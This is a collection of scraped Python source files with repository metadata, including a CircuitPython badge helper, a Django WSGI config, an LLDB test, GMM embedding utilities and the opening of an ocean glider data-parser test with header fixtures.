51c1bc127a4c49546336b970148e389031dc5f1c
| 3,020
|
py
|
Python
|
adafruit_circuitpython_libs/adafruit-circuitpython-bundle-py-20210214/lib/adafruit_pybadger/pewpewm4.py
|
jacoblb64/pico_rgb_keypad_hid
|
3251ca6a98ef86d9f98c54f639c4d61810601a0b
|
[
"MIT"
] | 47
|
2021-02-15T23:02:36.000Z
|
2022-03-04T21:30:03.000Z
|
adafruit_circuitpython_libs/adafruit-circuitpython-bundle-py-20210214/lib/adafruit_pybadger/pewpewm4.py
|
jacoblb64/pico_rgb_keypad_hid
|
3251ca6a98ef86d9f98c54f639c4d61810601a0b
|
[
"MIT"
] | 7
|
2021-02-19T20:00:08.000Z
|
2022-01-14T10:51:12.000Z
|
adafruit_circuitpython_libs/adafruit-circuitpython-bundle-py-20210214/lib/adafruit_pybadger/pewpewm4.py
|
jacoblb64/pico_rgb_keypad_hid
|
3251ca6a98ef86d9f98c54f639c4d61810601a0b
|
[
"MIT"
] | 14
|
2021-02-20T17:40:56.000Z
|
2022-01-01T19:53:38.000Z
|
# SPDX-FileCopyrightText: 2020 Kattni Rembor for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_pybadger.clue`
================================================================================
Badge-focused CircuitPython helper library for Pew Pew M4.
* Author(s): Kattni Rembor
Implementation Notes
--------------------
**Hardware:**
* `Pew Pew M4 <https://hackaday.io/project/165032-pewpew-m4>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
from collections import namedtuple
import board
import digitalio
import audioio
from gamepad import GamePad
from adafruit_pybadger.pybadger_base import PyBadgerBase
__version__ = "3.2.2"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_PyBadger.git"
Buttons = namedtuple("Buttons", ("o", "x", "z", "right", "down", "up", "left"))
class PewPewM4(PyBadgerBase):
"""Class that represents a single Pew Pew M4."""
_audio_out = audioio.AudioOut
_neopixel_count = 0
def __init__(self):
super().__init__()
self._buttons = GamePad(
digitalio.DigitalInOut(board.BUTTON_O),
digitalio.DigitalInOut(board.BUTTON_X),
digitalio.DigitalInOut(board.BUTTON_Z),
digitalio.DigitalInOut(board.BUTTON_RIGHT),
digitalio.DigitalInOut(board.BUTTON_DOWN),
digitalio.DigitalInOut(board.BUTTON_UP),
digitalio.DigitalInOut(board.BUTTON_LEFT),
)
@property
def button(self):
"""The buttons on the board.
Example use:
.. code-block:: python
from adafruit_pybadger import pybadger
while True:
if pybadger.button.x:
print("Button X")
elif pybadger.button.o:
print("Button O")
"""
button_values = self._buttons.get_pressed()
return Buttons(
*[
button_values & button
for button in (
PyBadgerBase.BUTTON_B,
PyBadgerBase.BUTTON_A,
PyBadgerBase.BUTTON_START,
PyBadgerBase.BUTTON_SELECT,
PyBadgerBase.BUTTON_RIGHT,
PyBadgerBase.BUTTON_DOWN,
PyBadgerBase.BUTTON_UP,
)
]
)
@property
def _unsupported(self):
"""This feature is not supported on PewPew M4."""
raise NotImplementedError("This feature is not supported on PewPew M4.")
# The following is a list of the features available in other PyBadger modules but
# not available for CLUE. If called while using a CLUE, they will result in the
# NotImplementedError raised in the property above.
light = _unsupported
acceleration = _unsupported
pixels = _unsupported
pewpewm4 = PewPewM4() # pylint: disable=invalid-name
"""Object that is automatically created on import."""
| 28.224299
| 85
| 0.614901
|
5e407c76203f0d695751560db53312f94d4dd1e3
| 494
|
py
|
Python
|
update_ratings.py
|
ClumsyLee/metanime
|
3534b3c7a980b7a879497d9b1de7040b16b5c439
|
[
"MIT"
] | 2
|
2019-02-07T07:24:11.000Z
|
2019-04-22T17:21:25.000Z
|
update_ratings.py
|
ClumsyLee/metanime
|
3534b3c7a980b7a879497d9b1de7040b16b5c439
|
[
"MIT"
] | null | null | null |
update_ratings.py
|
ClumsyLee/metanime
|
3534b3c7a980b7a879497d9b1de7040b16b5c439
|
[
"MIT"
] | null | null | null |
import logging
import sys
from metanime import Anime
def update_ratings(season, slug=None):
filename = f'seasons/{season}.yml'
animes = Anime.load(filename)
for anime in animes:
if slug is not None and anime.slug != slug:
continue
logging.info('Updating %s...', anime.slug)
anime.update_ratings()
Anime.dump(animes, filename)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
update_ratings(*sys.argv[1:])
| 21.478261
| 51
| 0.65587
|
d0b066e02b094a5648470beb6139ec10a833c5fe
| 409
|
py
|
Python
|
djangorestapidrf/wsgi.py
|
arabindamahato/DjangoREST_API_DRF
|
5292f47c4f29e64de4b5c15dc254a892b2661639
|
[
"MIT"
] | null | null | null |
djangorestapidrf/wsgi.py
|
arabindamahato/DjangoREST_API_DRF
|
5292f47c4f29e64de4b5c15dc254a892b2661639
|
[
"MIT"
] | 4
|
2021-03-19T01:51:07.000Z
|
2021-09-22T18:52:10.000Z
|
djangorestapidrf/wsgi.py
|
arabindamahato/DjangoREST_API_DRF
|
5292f47c4f29e64de4b5c15dc254a892b2661639
|
[
"MIT"
] | null | null | null |
"""
WSGI config for djangorestapidrf project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangorestapidrf.settings')
application = get_wsgi_application()
| 24.058824
| 78
| 0.794621
|
d23428e7fca4006b30d88e7b81ae7e475f12135d
| 1,861
|
py
|
Python
|
lldb/packages/Python/lldbsuite/test/lang/objc/foundation/TestRuntimeTypes.py
|
dan-zheng/llvm-project
|
6b792850da0345274758c9260fda5df5e57ab486
|
[
"Apache-2.0"
] | 765
|
2015-12-03T16:44:59.000Z
|
2022-03-07T12:41:10.000Z
|
lldb/packages/Python/lldbsuite/test/lang/objc/foundation/TestRuntimeTypes.py
|
dan-zheng/llvm-project
|
6b792850da0345274758c9260fda5df5e57ab486
|
[
"Apache-2.0"
] | 1,815
|
2015-12-11T23:56:05.000Z
|
2020-01-10T19:28:43.000Z
|
lldb/packages/Python/lldbsuite/test/lang/objc/foundation/TestRuntimeTypes.py
|
dan-zheng/llvm-project
|
6b792850da0345274758c9260fda5df5e57ab486
|
[
"Apache-2.0"
] | 284
|
2015-12-03T16:47:25.000Z
|
2022-03-12T05:39:48.000Z
|
"""
Test that Objective-C methods from the runtime work correctly.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
@skipUnlessDarwin
class RuntimeTypesTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@expectedFailureAll(
oslist=["macosx"],
debug_info="gmodules",
bugnumber="llvm.org/pr27862")
def test_break(self):
"""Test setting objc breakpoints using '_regexp-break' and 'breakpoint set'."""
if self.getArchitecture() != 'x86_64':
self.skipTest("This only applies to the v2 runtime")
self.build()
exe = self.getBuildArtifact("a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Stop at -[MyString description].
lldbutil.run_break_set_by_symbol(
self,
'-[MyString description]',
num_expected_locations=1,
sym_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The backtrace should show we stop at -[MyString description].
self.expect("thread backtrace", "Stop at -[MyString description]",
substrs=["a.out`-[MyString description]"])
# Use runtime information about NSString.
# The length property should be usable.
self.expect("expression str.length", VARIABLES_DISPLAYED_CORRECTLY,
patterns=[r"(\(unsigned long long\))|\(NSUInteger\)"])
# Static methods on NSString should work.
self.expect(
"expr [NSString stringWithCString:\"foo\" encoding:1]",
VALID_TYPE,
substrs=[
"(id)",
"$1"])
self.expect("po $1", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo"])
| 30.508197
| 87
| 0.616873
|
4c73449076922c3ac71c5850c2b4e34b5e98f480
| 674
|
py
|
Python
|
notebooks/Exploration.py
|
N4v1ds0n/king_county_EDA
|
e4245bcb65faae1e4f89bd71301f351ab473743b
|
[
"MIT"
] | null | null | null |
notebooks/Exploration.py
|
N4v1ds0n/king_county_EDA
|
e4245bcb65faae1e4f89bd71301f351ab473743b
|
[
"MIT"
] | null | null | null |
notebooks/Exploration.py
|
N4v1ds0n/king_county_EDA
|
e4245bcb65faae1e4f89bd71301f351ab473743b
|
[
"MIT"
] | null | null | null |
#This is where the code hits
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy import stats
import os
import csv
#%matplotlib inline
data = pd.read_csv("../data/King_County_House_prices_dataset.csv")
file = open("../data/King_County_House_prices_dataset.csv")
reader = csv.reader(file, delimiter=',')
for row in reader:
for column in row:
for column2 in row:
plot = data.plot(title=column+' '+column2 ,x = column, y= column2, kind='scatter', lw=2, colormap='jet')
plot.set_xlabel(column)
plot.set_ylabel(column2)
plt.savefig('images/'+column+ '-vs-' + column2 + '.png')
break
| 32.095238
| 116
| 0.673591
|
c1d1d3d6604e9d7a7b540a66352830f02403966c
| 2,352
|
py
|
Python
|
tests/models/symbol/pit_consistency_group_deletion_descriptor_test.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 5
|
2016-08-23T17:52:22.000Z
|
2019-05-16T08:45:30.000Z
|
tests/models/symbol/pit_consistency_group_deletion_descriptor_test.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 2
|
2016-11-10T05:30:21.000Z
|
2019-04-05T15:03:37.000Z
|
tests/models/symbol/pit_consistency_group_deletion_descriptor_test.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 7
|
2016-08-25T16:11:44.000Z
|
2021-02-22T05:31:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import unittest
from netapp.santricity.models.symbol.pit_consistency_group_deletion_descriptor import PITConsistencyGroupDeletionDescriptor
class PITConsistencyGroupDeletionDescriptorTest(unittest.TestCase):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
# Try instantiating the model
def test_pit_consistency_group_deletion_descriptor(self):
pit_consistency_group_deletion_descriptor_obj = PITConsistencyGroupDeletionDescriptor()
self.assertNotEqual(pit_consistency_group_deletion_descriptor_obj, None)
| 61.894737
| 845
| 0.789966
|
3223fd10a9346402503ec80ebd2f713e01872aaf
| 1,140
|
py
|
Python
|
check_line_length.py
|
EdgeKing810/openwisp2-docs
|
4a7c06ddb6dcad1a66cfe2e1ba6b087a4a83277b
|
[
"BSD-3-Clause"
] | null | null | null |
check_line_length.py
|
EdgeKing810/openwisp2-docs
|
4a7c06ddb6dcad1a66cfe2e1ba6b087a4a83277b
|
[
"BSD-3-Clause"
] | null | null | null |
check_line_length.py
|
EdgeKing810/openwisp2-docs
|
4a7c06ddb6dcad1a66cfe2e1ba6b087a4a83277b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import glob
import os
import re
import sys
LIMIT = 75
def check_url(line):
"""
Check if there is a url present in the given line
"""
pattern = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
url = re.findall(pattern, line)
return bool(url)
def check_line_length(file_path):
"""
Ensures line length of lines in file specified in ``file_path`` are lower than ``LIMIT``,
interrupts execution with exit code 1 otherwise
"""
file = file_path.split('/')[-1]
with open(file_path) as f:
lines = f.readlines()
for (line_number, line) in enumerate(lines, start=1):
length = len(line)
if length > LIMIT and check_url(line) is not True:
print('line {} in file {} is longer '
'than {} characters'.format(line_number, file, LIMIT))
sys.exit(1)
def main():
current_path = os.getcwd()
file_paths = glob.glob(current_path + '/**/*.rst')
for file_path in file_paths:
check_line_length(file_path)
if __name__ == '__main__':
main()
| 24.782609
| 95
| 0.588596
|
706f670cccb0e997ff749dc96938bcfa63a5196b
| 2,669
|
py
|
Python
|
utils/gmm_utils.py
|
omegafragger/TransGAN
|
ed2590026c4534fe778f11da614e4f22e15ff1d9
|
[
"MIT"
] | null | null | null |
utils/gmm_utils.py
|
omegafragger/TransGAN
|
ed2590026c4534fe778f11da614e4f22e15ff1d9
|
[
"MIT"
] | null | null | null |
utils/gmm_utils.py
|
omegafragger/TransGAN
|
ed2590026c4534fe778f11da614e4f22e15ff1d9
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from tqdm import tqdm
DOUBLE_INFO = torch.finfo(torch.double)
JITTERS = [0, DOUBLE_INFO.tiny] + [10 ** exp for exp in range(-50, 0, 5)]
def centered_cov_torch(x):
n = x.shape[0]
res = 1 / (n - 1) * x.t().mm(x)
return res
def get_embeddings(
net, loader: torch.utils.data.DataLoader, num_dim: int, dtype, device, storage_device,
):
num_samples = len(loader.dataset)
embeddings = torch.empty((num_samples, num_dim), dtype=dtype, device=storage_device)
labels = torch.empty(num_samples, dtype=torch.int, device=storage_device)
with torch.no_grad():
start = 0
for data, label in tqdm(loader):
data = data.to(device)
label = label.to(device)
if isinstance(net, nn.DataParallel):
out = net.module(data)
out = net.module.feature
else:
out = net(data)
out = net.feature
end = start + len(data)
embeddings[start:end].copy_(out, non_blocking=True)
labels[start:end].copy_(label, non_blocking=True)
start = end
return embeddings, labels
def gmm_forward(net, gaussians_model, data_B_X):
if isinstance(net, nn.DataParallel):
features_B_Z = net.module(data_B_X)
features_B_Z = net.module.feature
else:
features_B_Z = net(data_B_X)
features_B_Z = net.feature
log_probs_B_Y = gaussians_model.log_prob(features_B_Z[:, None, :])
return log_probs_B_Y
def gmm_fit(embeddings, labels, num_classes):
with torch.no_grad():
classwise_mean_features = torch.stack([torch.mean(embeddings[labels == c], dim=0) for c in range(num_classes)])
classwise_cov_features = torch.stack(
[centered_cov_torch(embeddings[labels == c] - classwise_mean_features[c]) for c in range(num_classes)]
)
with torch.no_grad():
for jitter_eps in JITTERS:
print (jitter_eps)
try:
jitter = jitter_eps * torch.eye(
classwise_cov_features.shape[1], device=classwise_cov_features.device,
).unsqueeze(0)
gmm = torch.distributions.MultivariateNormal(
loc=classwise_mean_features, covariance_matrix=(classwise_cov_features + jitter),
)
except RuntimeError as e:
if "cholesky" in str(e):
continue
except ValueError as e:
if "The parameter covariance_matrix has invalid values" in str(e):
continue
break
return gmm, jitter_eps
| 32.54878
| 119
| 0.606594
|
ac423549915f6011e161f05f4a60b8705c03009b
| 88,625
|
py
|
Python
|
mi/dataset/parser/test/test_glider.py
|
krosburg/mi-instrument
|
aa962fd1869a582aa3f712b7ae8c6ce2d7d3785a
|
[
"BSD-2-Clause"
] | null | null | null |
mi/dataset/parser/test/test_glider.py
|
krosburg/mi-instrument
|
aa962fd1869a582aa3f712b7ae8c6ce2d7d3785a
|
[
"BSD-2-Clause"
] | null | null | null |
mi/dataset/parser/test/test_glider.py
|
krosburg/mi-instrument
|
aa962fd1869a582aa3f712b7ae8c6ce2d7d3785a
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_glider Base dataset parser test code
@file mi/dataset/parser/test/test_glider.py
@author Chris Wingard, Stuart Pearce, Nick Almonte
@brief Test code for a Glider data parser.
"""
import os
from StringIO import StringIO
from nose.plugins.attrib import attr
from mi.core.exceptions import ConfigurationException
from mi.core.log import get_logger
from mi.dataset.parser.utilities import particle_to_yml
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.driver.moas.gl.ctdgv.resource import RESOURCE_PATH as CTDGV_RESOURCE_PATH
from mi.dataset.driver.moas.gl.dosta.resource import RESOURCE_PATH as DOSTA_RESOURCE_PATH
from mi.dataset.driver.moas.gl.engineering.resource import RESOURCE_PATH as ENG_RESOURCE_PATH
from mi.dataset.driver.moas.gl.flord_m.resource import RESOURCE_PATH as FLORD_M_RESOURCE_PATH
from mi.dataset.driver.moas.gl.flort_m.resource import RESOURCE_PATH as FLORT_M_RESOURCE_PATH
from mi.dataset.driver.moas.gl.flort_o.resource import RESOURCE_PATH as FLORT_O_RESOURCE_PATH
from mi.dataset.driver.moas.gl.parad.resource import RESOURCE_PATH as PARAD_RESOURCE_PATH
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.glider import GliderParser, GliderEngineeringParser
from mi.dataset.parser.glider import CtdgvRecoveredDataParticle, CtdgvTelemeteredDataParticle, CtdgvParticleKey
from mi.dataset.parser.glider import DostaTelemeteredDataParticle, DostaTelemeteredParticleKey
from mi.dataset.parser.glider import DostaRecoveredDataParticle, DostaRecoveredParticleKey
from mi.dataset.parser.glider import FlordRecoveredDataParticle, FlordTelemeteredDataParticle, FlordParticleKey
from mi.dataset.parser.glider import FlortRecoveredDataParticle, FlortRecoveredParticleKey
from mi.dataset.parser.glider import FlortTelemeteredDataParticle, FlortTelemeteredParticleKey
from mi.dataset.parser.glider import FlortODataParticle, FlortODataParticleKey
from mi.dataset.parser.glider import ParadRecoveredDataParticle, ParadRecoveredParticleKey
from mi.dataset.parser.glider import ParadTelemeteredDataParticle, ParadTelemeteredParticleKey
from mi.dataset.parser.glider import EngineeringTelemeteredParticleKey
from mi.dataset.parser.glider import EngineeringTelemeteredDataParticle
from mi.dataset.parser.glider import EngineeringScienceTelemeteredParticleKey
from mi.dataset.parser.glider import EngineeringScienceTelemeteredDataParticle
from mi.dataset.parser.glider import EngineeringMetadataParticleKey
from mi.dataset.parser.glider import EngineeringMetadataDataParticle
from mi.dataset.parser.glider import EngineeringMetadataRecoveredDataParticle
from mi.dataset.parser.glider import EngineeringRecoveredParticleKey
from mi.dataset.parser.glider import EngineeringRecoveredDataParticle
from mi.dataset.parser.glider import EngineeringScienceRecoveredParticleKey
from mi.dataset.parser.glider import EngineeringScienceRecoveredDataParticle, EngineeringClassKey
from mi.dataset.parser.glider import GpsPositionDataParticle, GpsPositionParticleKey
log = get_logger()
HEADER = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_363-2013-245-6-6
the8x3_filename: 01790006
filename_extension: sbd
filename_label: unit_363-2013-245-6-6-sbd(01790006)
mission_name: TRANS58.MI
fileopen_time: Thu_Sep__5_02:46:15_2013
sensors_per_cycle: 29
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_363-2013-245-6-6
c_battpos c_wpt_lat c_wpt_lon m_battpos m_coulomb_amphr_total m_coulomb_current m_depth m_de_oil_vol m_gps_lat m_gps_lon m_heading m_lat m_lon m_pitch m_present_secs_into_mission m_present_time m_speed m_water_vx m_water_vy x_low_power_status sci_flbb_bb_units sci_flbb_chlor_units sci_m_present_secs_into_mission sci_m_present_time sci_oxy4_oxygen sci_oxy4_saturation sci_water_cond sci_water_pressure sci_water_temp
in lat lon in amp-hrs amp m cc lat lon rad lat lon rad sec timestamp m/s m/s m/s nodim nodim ug/l sec timestamp um % s/m bar degc
4 8 8 4 4 4 4 4 8 8 4 8 8 4 4 8 4 4 4 4 4 4 4 8 4 4 4 4 4 """
# header from sample data in ctdgv driver test
HEADER2 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_363-2013-245-6-6
the8x3_filename: 01790006
filename_extension: sbd
filename_label: unit_363-2013-245-6-6-sbd(01790006)
mission_name: TRANS58.MI
fileopen_time: Thu_Sep__5_02:46:15_2013
sensors_per_cycle: 29
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_363-2013-245-6-6
c_battpos c_wpt_lat c_wpt_lon m_battpos m_coulomb_amphr_total m_coulomb_current m_depth m_de_oil_vol m_gps_lat m_gps_lon m_heading m_lat m_lon m_pitch m_present_secs_into_mission m_present_time m_speed m_water_vx m_water_vy x_low_power_status sci_flbb_bb_units sci_flbb_chlor_units sci_m_present_secs_into_mission sci_m_present_time sci_oxy4_oxygen sci_oxy4_saturation sci_water_cond sci_water_pressure sci_water_temp
in lat lon in amp-hrs amp m cc lat lon rad lat lon rad sec timestamp m/s m/s m/s nodim nodim ug/l sec timestamp um % s/m bar degc
4 8 8 4 4 4 4 4 8 8 4 8 8 4 4 8 4 4 4 4 4 4 4 8 4 4 4 4 4 """
HEADER3 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_247-2012-051-0-0-sf
the8x3_filename: 01840000
filename_extension: dbd
filename_label: unit_247-2012-051-0-0-dbd(01840000)
mission_name: ENDUR1.MI
fileopen_time: Tue_Feb_21_18:39:39_2012
sensors_per_cycle: 346
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_247-2012-051-0-0
c_air_pump c_ballast_pumped c_battpos c_battroll c_bsipar_on c_de_oil_vol c_dvl_on c_flbbcd_on c_heading c_oxy3835_wphase_on c_pitch c_profile_on c_wpt_lat c_wpt_lon m_1meg_persistor m_aground_water_depth m_air_fill m_air_pump m_altimeter_status m_altimeter_voltage m_altitude m_altitude_rate m_appear_to_be_at_surface m_argos_is_xmitting m_argos_on m_argos_sent_data m_argos_timestamp m_at_risk_depth m_avbot_enable m_avbot_power m_avg_climb_rate m_avg_depth_rate m_avg_dive_rate m_avg_downward_inflection_time m_avg_speed m_avg_system_clock_lags_gps m_avg_upward_inflection_time m_avg_yo_time m_ballast_pumped m_ballast_pumped_energy m_ballast_pumped_vel m_battery m_battery_inst m_battpos m_battpos_vel m_battroll m_battroll_vel m_bpump_fault_bit m_certainly_at_surface m_chars_tossed_by_abend m_chars_tossed_with_cd_off m_chars_tossed_with_power_off m_climb_tot_time m_console_cd m_console_on m_cop_tickle m_coulomb_amphr m_coulomb_amphr_raw m_coulomb_amphr_total m_coulomb_current m_coulomb_current_raw m_cycle_number m_depth m_depth_rate m_depth_rate_avg_final m_depth_rate_running_avg m_depth_rate_running_avg_n m_depth_rate_subsampled m_depth_rejected m_depth_state m_depth_subsampled m_device_drivers_called_abnormally m_device_error m_device_oddity m_device_warning m_de_oil_vol m_de_oil_vol_pot_voltage m_de_pump_fault_count m_digifin_cmd_done m_digifin_cmd_error m_digifin_leakdetect_reading m_digifin_motorstep_counter m_digifin_resp_data m_digifin_status m_disk_free m_disk_usage m_dist_to_wpt m_dive_depth m_dive_tot_time m_dr_fix_time m_dr_postfix_time m_dr_surf_x_lmc m_dr_surf_y_lmc m_dr_time m_dr_x_actual_err m_dr_x_ini_err m_dr_x_postfix_drift m_dr_x_ta_postfix_drift m_dr_y_actual_err m_dr_y_ini_err m_dr_y_postfix_drift m_dr_y_ta_postfix_drift m_est_time_to_surface m_fin m_final_water_vx m_final_water_vy m_fin_vel m_fluid_pumped m_fluid_pumped_aft_hall_voltage m_fluid_pumped_fwd_hall_voltage m_fluid_pumped_vel m_free_heap m_gps_dist_from_dr m_gps_fix_x_lmc m_gps_fix_y_lmc m_gps_full_status m_gps_heading m_gps_ignored_lat m_gps_ignored_lon m_gps_invalid_lat m_gps_invalid_lon m_gps_lat m_gps_lon m_gps_mag_var m_gps_num_satellites m_gps_on m_gps_postfix_x_lmc m_gps_postfix_y_lmc m_gps_speed m_gps_status m_gps_toofar_lat m_gps_toofar_lon m_gps_uncertainty m_gps_utc_day m_gps_utc_hour m_gps_utc_minute m_gps_utc_month m_gps_utc_second m_gps_utc_year m_gps_x_lmc m_gps_y_lmc m_hdg_derror m_hdg_error m_hdg_ierror m_hdg_rate m_heading m_initial_water_vx m_initial_water_vy m_iridium_attempt_num m_iridium_call_num m_iridium_connected m_iridium_console_on m_iridium_dialed_num m_iridium_on m_iridium_redials m_iridium_signal_strength m_iridium_status m_iridium_waiting_redial_delay m_iridium_waiting_registration m_is_ballast_pump_moving m_is_battpos_moving m_is_battroll_moving m_is_de_pump_moving m_is_fin_moving m_is_fpitch_pump_moving m_is_speed_estimated m_is_thermal_valve_moving m_last_yo_time m_lat m_leak m_leakdetect_voltage m_leakdetect_voltage_forward m_leak_forward m_lithium_battery_relative_charge m_lithium_battery_status m_lithium_battery_time_to_charge m_lithium_battery_time_to_discharge m_lon m_min_free_heap m_min_spare_heap m_mission_avg_speed_climbing m_mission_avg_speed_diving m_mission_start_time m_num_half_yos_in_segment m_pitch m_pitch_energy m_pitch_error m_present_secs_into_mission m_present_time m_pressure m_pressure_raw_voltage_sample0 m_pressure_raw_voltage_sample19 m_pressure_voltage m_raw_altitude m_raw_altitude_rejected m_roll m_science_clothesline_lag m_science_on m_science_ready_for_consci m_science_sent_some_data m_science_sync_time m_science_unreadiness_for_consci m_spare_heap m_speed m_stable_comms m_strobe_ctrl m_surface_est_cmd m_surface_est_ctd m_surface_est_fw m_surface_est_gps m_surface_est_irid m_surface_est_total m_system_clock_lags_gps m_tcm3_is_calibrated m_tcm3_magbearth m_tcm3_poll_time m_tcm3_recv_start_time m_tcm3_recv_stop_time m_tcm3_stddeverr m_tcm3_xcoverage m_tcm3_ycoverage m_tcm3_zcoverage m_thermal_acc_pres m_thermal_acc_pres_voltage m_thermal_acc_vol m_thermal_enuf_acc_vol m_thermal_pump m_thermal_updown m_thermal_valve m_time_til_wpt m_tot_ballast_pumped_energy m_tot_horz_dist m_tot_num_inflections m_tot_on_time m_vacuum m_vehicle_temp m_veh_overheat m_veh_temp m_vmg_to_wpt m_vx_lmc m_vy_lmc m_water_cond m_water_delta_vx m_water_delta_vy m_water_depth m_water_pressure m_water_temp m_water_vx m_water_vy m_why_started m_x_lmc m_y_lmc x_last_wpt_lat x_last_wpt_lon x_system_clock_adjusted sci_bsipar_is_installed sci_bsipar_par sci_bsipar_sensor_volts sci_bsipar_supply_volts sci_bsipar_temp sci_bsipar_timestamp sci_ctd41cp_is_installed sci_ctd41cp_timestamp sci_dvl_bd_range_to_bottom sci_dvl_bd_time_since_last_good_vel sci_dvl_bd_u_dist sci_dvl_bd_v_dist sci_dvl_bd_w_dist sci_dvl_be_u_vel sci_dvl_be_v_vel sci_dvl_be_vel_good sci_dvl_be_w_vel sci_dvl_bi_err_vel sci_dvl_bi_vel_good sci_dvl_bi_x_vel sci_dvl_bi_y_vel sci_dvl_bi_z_vel sci_dvl_bs_longitudinal_vel sci_dvl_bs_normal_vel sci_dvl_bs_transverse_vel sci_dvl_bs_vel_good sci_dvl_ensemble_offset sci_dvl_error sci_dvl_is_installed sci_dvl_sa_heading sci_dvl_sa_pitch sci_dvl_sa_roll sci_dvl_ts_bit sci_dvl_ts_depth sci_dvl_ts_sal sci_dvl_ts_sound_speed sci_dvl_ts_temp sci_dvl_ts_timestamp sci_dvl_wd_range_to_water_mass_center sci_dvl_wd_time_since_last_good_vel sci_dvl_wd_u_dist sci_dvl_wd_v_dist sci_dvl_wd_w_dist sci_dvl_we_u_vel sci_dvl_we_v_vel sci_dvl_we_vel_good sci_dvl_we_w_vel sci_dvl_wi_err_vel sci_dvl_wi_vel_good sci_dvl_wi_x_vel sci_dvl_wi_y_vel sci_dvl_wi_z_vel sci_dvl_ws_longitudinal_vel sci_dvl_ws_normal_vel sci_dvl_ws_transverse_vel sci_dvl_ws_vel_good sci_flbbcd_bb_ref sci_flbbcd_bb_sig sci_flbbcd_bb_units sci_flbbcd_cdom_ref sci_flbbcd_cdom_sig sci_flbbcd_cdom_units sci_flbbcd_chlor_ref sci_flbbcd_chlor_sig sci_flbbcd_chlor_units sci_flbbcd_is_installed sci_flbbcd_therm sci_flbbcd_timestamp sci_m_disk_free sci_m_disk_usage sci_m_free_heap sci_m_min_free_heap sci_m_min_spare_heap sci_m_present_secs_into_mission sci_m_present_time sci_m_science_on sci_m_spare_heap sci_oxy3835_is_installed sci_oxy3835_oxygen sci_oxy3835_saturation sci_oxy3835_temp sci_oxy3835_timestamp sci_reqd_heartbeat sci_software_ver sci_wants_comms sci_wants_surface sci_water_cond sci_water_pressure sci_water_temp sci_x_disk_files_removed sci_x_sent_data_files
